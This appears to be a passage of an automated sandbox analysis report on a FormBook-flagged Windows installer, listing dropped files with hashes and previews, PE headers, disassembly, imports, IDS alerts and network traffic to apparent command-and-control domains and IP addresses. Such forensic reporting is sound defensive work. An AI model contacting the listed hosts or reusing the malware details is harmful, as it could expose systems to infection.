                                                                          2320900000000.exeGet hashmaliciousBrowse
                                                                            CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                              5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                  AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                    090049000009000.exeGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\lsemennd
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):56673
                                                                                      Entropy (8bit):4.970773930948534
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:R20gYxZ/Kg7zfrOHzHyyukuUKFvL4D04U7YYRiFiswp:o05Z/Kg7HOHzKY0wYRiS
                                                                                      MD5:F95B23E6289D1281F61129ED8AC17124
                                                                                      SHA1:AB0A3D90CAC7E7B8A9E9856FB0E24F4B93498E0D
                                                                                      SHA-256:7DD01877C1A940E1D6E761AB769370B2CAF2BA2CC967082D7B12328E837518A8
                                                                                      SHA-512:9FDA413CE2E868B4F1BF8DFC4C65838525B22C892B18B52F591AAF1BF21C59E4FC73A7ADA8A5D22002ECF0AD2576AB0DD2C6FC6C3EBD2B4BEFBA1D4A547D3C56
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: U......#....D.....E.....F.....G...o.H...o.I.....J.....K...k.L.....M...-.N...s.O...o.P.....Q.....R...k.S.....T...k.U.....V...z.W...o.X...o.Y.....Z.....[.....\...o.]...:.^....._...G.`.....a...o.b...o.c...o.d.....e.....f.....g.....h.....i.....j.....k.....l...G.m...o.n.....o.....p.....q.....r.....s...1.t...o.u...o.v.....w.....x.....y.....z.....{.....|.....}.....~.........G.......................G.................:.........../...........o.....o.....o.................O...................................3................./.....o.............................3.....1.....o.....o.................3.......................3................./......................./.................:...........7...........o.....o.....o.......................................................................7.....o...................................1.....o.....o..................
                                                                                      C:\Users\user\AppData\Local\Temp\nsvDA2C.tmp
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):276728
                                                                                      Entropy (8bit):7.477737961289009
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:w4YziQaUsVYAcvdY0yX/wcV0LbATJj92DkHUKY0kt:zYziQqVYVY0gwW04GSUKYN
                                                                                      MD5:913EAD302DB3A2438A73EA361174257A
                                                                                      SHA1:847631998D6B838A753B3794DFD9C7337CF9A9D0
                                                                                      SHA-256:D965EBAD5B2092374EF6C88CCE8E045DD0715A4BB45A59A8090232B034B21E3F
                                                                                      SHA-512:6F607C7327037E1F3F4DD476358A4387A34F4AE383D71DF15D9C4D861946FBF263E9E51EABEE92699CBB4ED86C76E7F62FF4AF470342178E3E5C78DA02F352CE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: .S......,.......................p=.......R......oS..........................................................................................................................................................................................................................................J...............!...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.855045165595541
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: moq fob order.exe, Detection: malicious, Browse
                                                                                      • Filename: 0900000000000090000.exe, Detection: malicious, Browse
                                                                                      • Filename: 444890321.exe, Detection: malicious, Browse
                                                                                      • Filename: Packing-List_00930039.exe, Detection: malicious, Browse
                                                                                      • Filename: 2435.exe, Detection: malicious, Browse
                                                                                      • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                      • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                      • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                      • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                      • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                      • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                      • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                      • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                      • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                      • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                      • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                      • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                      • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                      • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                      • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\ymhuzov3o2q1at
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):186880
                                                                                      Entropy (8bit):7.999097081713126
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:xgst4EziQaY9ga+VYAcv3aGY0yXRsCz5ufmwytkQVPKLYkA2w7v0Ud9HIcZ2a:WYziQaUsVYAcvdY0yX/wcV0LbATJj92a
                                                                                      MD5:0A8021CB1A87799447CAE887D90E22BB
                                                                                      SHA1:D775275C6ECF3EE1FF9FECAF5830ED1E256D3E10
                                                                                      SHA-256:751DEE316732301CE8CD9AFBE4565814E3527D6B5E902AB3A43765915E812B36
                                                                                      SHA-512:EC5237A86866D9A2ABA7056B3DEA65278C4B7D527DEE4EBFD6BE07314144F9044D44F79CEE238A6C7D2750EA2C70C23A709BA876C28E36FC10AFA20A9F7340E6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: ./b.\\.c.u.m.$....M.r.\..[.G..%.....T....iW...R.G...#..k.0...C.q*.c.#.R..9.C.s.....f...r..*y.O...".....j..,e.}>Z..%......S...k..`.#......G2..^..r.'...RLS.MAmZMR..F.;3A.8..#P..^m..5.I+....>>...<.sUb.......X..b..r;..8X4?:P...t..H..._..A&x.c...r./.oz{._j.&:.h..<.n.Y7.i*./yD..K..I../UN....h..Z@.h+......@.....(.B>h..v...-.Cm.5y.A.U..$..Q.R.hA.j..4....c.M......h..9m.....e.Z...L.t@.........>(.....&..-2?j..S>.ZJ.9c..E...(.i..X......x.:....0...........v.C.F.\..#CQ.......id.L.z.#..........y%...:..Z.z.|..l..=..o....6.:...1F...w)..(z.-.....:Iy......{...YYC..R.S.m........n..j.x.["8P..r....#/......[.e".4&.'<s.,.(`1.nr|\.C...D.I..">..6.0.!..*r.......Ja..p.h".&8)hc.b.U=87.y.$@...G~.)gj..)........>.yH..c.j..m..../.Py...v@.....1..&...c,B*?..L9..;.....C.$W.|."_...},.f..d..q...[......@.{.yF..u.._...,........Z.Zj........C...$@..d.P.6...x.X.8....&C.........Ry$....c.'.......q..e..ZKy.eH...y`.y..]/..z.\....q..`R.7...t.<.<Y..0Q.ja.m.t.,.......@.^...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.925274027835951
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:SX365783909782021.exe
                                                                                      File size:245880
                                                                                      MD5:ee1f4a07b874aa6ba18d6aa0f83252d3
                                                                                      SHA1:d17b97dc47707b685bc8976d3cbc6cdbfbd5fcee
                                                                                      SHA256:d66268222a39fd97e792983a3bacdb1e81067b7a28848a87fe65a5dc91f7e82a
                                                                                      SHA512:a9dad5dc2c70277d972b184a6177e07316f2e286b6597597f5d0a5095e3716d599b08dd8ca9339019bba48f847af90b68de0a06b1c947645d22eeddd1d41aab6
                                                                                      SSDEEP:6144:Ds9u96cRH4eb7DCIKDDsd5iCRFX7yYjjqe1/w:yprebPlWDmDFL5lI
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                      File Icon

                                                                                      Icon Hash:b2a88c96b2ca6a72

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x40323c
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:099c0646ea7282d232219f8807883be0

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000180h
                                                                                      push ebx
                                                                                      push ebp
                                                                                      push esi
                                                                                      xor ebx, ebx
                                                                                      push edi
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                      xor esi, esi
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [00407030h]
                                                                                      push 00008001h
                                                                                      call dword ptr [004070B4h]
                                                                                      push ebx
                                                                                      call dword ptr [0040727Ch]
                                                                                      push 00000008h
                                                                                      mov dword ptr [00423F58h], eax
                                                                                      call 00007F736CBA2E9Eh
                                                                                      mov dword ptr [00423EA4h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+34h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 0041F458h
                                                                                      call dword ptr [00407158h]
                                                                                      push 004091B8h
                                                                                      push 004236A0h
                                                                                      call 00007F736CBA2B51h
                                                                                      call dword ptr [004070B0h]
                                                                                      mov edi, 00429000h
                                                                                      push eax
                                                                                      push edi
                                                                                      call 00007F736CBA2B3Fh
                                                                                      push ebx
                                                                                      call dword ptr [0040710Ch]
                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                      mov dword ptr [00423EA0h], eax
                                                                                      mov eax, edi
                                                                                      jne 00007F736CBA029Ch
                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                      mov eax, 00429001h
                                                                                      push dword ptr [esp+14h]
                                                                                      push eax
                                                                                      call 00007F736CBA2632h
                                                                                      push eax
                                                                                      call dword ptr [0040721Ch]
                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                      jmp 00007F736CBA02F5h
                                                                                      cmp cl, 00000020h
                                                                                      jne 00007F736CBA0298h
                                                                                      inc eax
                                                                                      cmp byte ptr [eax], 00000020h
                                                                                      je 00007F736CBA028Ch
                                                                                      cmp byte ptr [eax], 00000022h
                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                      RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                      RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                      RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                      RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                      RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      06/11/21-13:17:26.479173TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3168.235.88.209
                                                                                      06/11/21-13:17:26.479173TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3168.235.88.209
                                                                                      06/11/21-13:17:26.479173TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3168.235.88.209
                                                                                      06/11/21-13:18:09.635602TCP1201ATTACK-RESPONSES 403 Forbidden804974434.102.136.180192.168.2.3

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jun 11, 2021 13:17:07.099303961 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.160387039 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.160540104 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.160631895 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.221529007 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.244602919 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.244649887 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.245737076 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.245819092 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.306950092 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.353113890 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.478756905 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.478907108 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.479172945 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.604927063 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.604996920 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.605030060 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.605240107 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.605274916 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.731089115 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:46.943417072 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.070945024 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.071057081 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.071191072 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.198822975 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.198865891 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.198894978 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.199040890 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.199083090 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.328054905 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.453979015 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.496193886 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.496407986 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.496512890 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.538758993 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.635601997 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.635651112 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.635879040 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.635945082 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.678459883 CEST804974434.102.136.180192.168.2.3

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jun 11, 2021 13:16:00.477242947 CEST5598453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:00.535623074 CEST53559848.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:01.364681959 CEST6418553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:01.423135042 CEST53641858.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:02.154920101 CEST6511053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:02.216130972 CEST53651108.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:02.961894989 CEST5836153192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:03.012481928 CEST53583618.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:03.829423904 CEST6349253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:03.883028030 CEST53634928.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:04.826154947 CEST6083153192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:04.879234076 CEST53608318.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:05.713776112 CEST6010053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:05.766681910 CEST53601008.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:06.733460903 CEST5319553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:06.783581972 CEST53531958.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:07.550322056 CEST5014153192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:07.601269960 CEST53501418.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:08.434130907 CEST5302353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:08.485183954 CEST53530238.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:09.220379114 CEST4956353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:09.270889044 CEST53495638.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:10.143351078 CEST5135253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:10.196475983 CEST53513528.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:11.505176067 CEST5934953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:11.556746960 CEST53593498.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:12.765260935 CEST5708453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:12.815587997 CEST53570848.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:13.655117989 CEST5882353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:13.713887930 CEST53588238.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:14.434154987 CEST5756853192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:14.484518051 CEST53575688.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:15.366101980 CEST5054053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:15.419224024 CEST53505408.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:16.616947889 CEST5436653192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:16.667341948 CEST53543668.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:17.391630888 CEST5303453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:17.444385052 CEST53530348.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:34.987735987 CEST5776253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:35.049618959 CEST53577628.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:44.285569906 CEST5543553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:44.344434023 CEST53554358.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.007029057 CEST5071353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:07.093458891 CEST53507138.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:19.431802988 CEST5613253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:19.501478910 CEST53561328.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:23.321549892 CEST5898753192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:23.384686947 CEST53589878.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.274321079 CEST5657953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST53565798.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:46.783575058 CEST6063353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST53606338.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:54.752721071 CEST6129253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:54.820560932 CEST53612928.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:56.146701097 CEST6361953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:56.208626032 CEST53636198.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.391463995 CEST6493853192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST53649388.8.8.8192.168.2.3

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jun 11, 2021 13:17:07.007029057 CEST192.168.2.38.8.8.80xb120Standard query (0)www.vacalinda.comA (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.274321079 CEST192.168.2.38.8.8.80xc82dStandard query (0)www.servicesbackyard.comA (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:46.783575058 CEST192.168.2.38.8.8.80xade4Standard query (0)www.djspencer.comA (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:18:09.391463995 CEST192.168.2.38.8.8.80xd817Standard query (0)www.caravansforsalenorthwales.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
